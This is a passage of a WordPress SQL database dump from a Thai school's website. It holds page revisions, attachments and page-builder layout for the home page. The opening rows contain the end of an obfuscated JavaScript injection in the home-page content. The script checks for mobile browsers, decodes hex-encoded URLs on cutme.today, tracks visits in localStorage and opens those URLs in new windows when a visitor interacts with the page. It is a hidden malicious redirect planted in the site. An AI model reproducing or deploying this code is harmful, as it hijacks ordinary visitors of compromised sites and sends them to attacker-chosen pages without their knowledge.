|kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-07-16 13:57:42','2025-07-16 06:57:42','',14,'http://pakhaeng.ssk.in.th/?p=1900',0,'revision','',0),
(1901,1,'2025-07-16 14:13:20','2025-07-16 07:13:20','','กระดาน ถาม - ตอบ','','inherit','','closed','','%e0%b8%81%e0%b8%a3%e0%b8%b0%e0%b8%94%e0%b8%b2%e0%b8%99-%e0%b8%96%e0%b8%b2%e0%b8%a1-%e0%b8%95%e0%b8%ad%e0%b8%9a','','','2025-07-16 14:13:20','2025-07-16 07:13:20','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/กระดาน-ถาม-ตอบ.gif',0,'attachment','image/gif',0),
(1903,1,'2025-07-21 10:40:55','2025-07-21 03:40:55','','prr','','inherit','','closed','','prr','','','2025-07-21 10:40:55','2025-07-21 03:40:55','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr.png',0,'attachment','image/png',0),
(1904,1,'2025-07-21 10:42:49','2025-07-21 03:42:49','','prr','','inherit','','closed','','prr-2','','','2025-07-21 10:42:49','2025-07-21 03:42:49','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png',0,'attachment','image/png',0),
(1905,1,'2025-07-21 10:50:24','2025-07-21 03:50:24','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_d4f0fe-83\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_f5c57d-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_f5c57d-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a 